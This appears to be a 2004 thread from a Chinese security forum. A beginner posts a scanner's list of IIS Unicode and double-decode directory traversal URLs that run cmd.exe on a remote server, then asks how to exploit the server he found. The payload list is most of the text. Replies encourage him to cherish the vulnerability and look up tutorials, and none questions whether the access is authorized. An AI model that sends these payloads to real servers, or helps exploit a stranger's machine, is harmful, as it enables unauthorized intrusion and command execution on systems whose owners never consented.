论坛: 菜鸟乐园 标题: 请教:这些IIS漏洞怎么利用??? 复制本贴地址    
作者: kekeweb [kekeweb]    论坛用户   登录
[IIS漏洞]

/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]

/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述]

/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]

可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞


插件类型: HTTP
插件成员名称: IIS漏洞
插件作者: glacier
插件版本: 1.4
风险等级: 高
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎



地主 发表时间: 04-04-09 11:49

回复: tuzi [tuzi]   版主   登录
不会吧  现在还有U漏洞的WEB服务器 呵呵


B1层 发表时间: 04-04-09 12:13

回复: hcz [hcz]   论坛用户   登录
你发了,呵呵,

B2层 发表时间: 04-04-09 13:55

回复: chiru [chiru]   论坛用户   登录
晕啊。运气这么好啊。

B3层 发表时间: 04-04-09 14:09

回复: kekeweb [kekeweb]   论坛用户   登录
这个漏洞是我偶然扫描出来的,我是菜鸟,所以请诸位大哥帮我一下,怎么样才能利用好此漏洞,能够做些什么呢?

B4层 发表时间: 04-04-09 15:23

回复: cooke [cnpowers]   论坛用户   登录
我靠这么老的漏洞了,这不知道网管是怎么作的,怎么利用啊,网上一查,就是一堆一堆的阿

B5层 发表时间: 04-04-09 15:45

回复: kekeweb [kekeweb]   论坛用户   登录
我真的很菜,大家帮一下我,到底可以利用这样的漏洞做什么呢??谢谢大家,我的QQ:1010495

B6层 发表时间: 04-04-09 15:52

回复: lijingxi [lijingxi]   见习版主   登录
这样的漏洞很少了!你珍惜吧,这些漏洞太适合菜鸟学习了!
真羡慕你! 努力,网络上多这样的教程的,你自己随便找找吧!

B7层 发表时间: 04-04-09 16:13

回复: kekeweb [kekeweb]   论坛用户   登录
我也觉得自己该珍惜这样一个漏洞,可是很菜的我就是不知道怎么用,网上我已经看了好久了,可是具体操作我就是不知道,各位好心的兄弟帮我好吗??感激不尽!

B8层 发表时间: 04-04-09 16:37

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号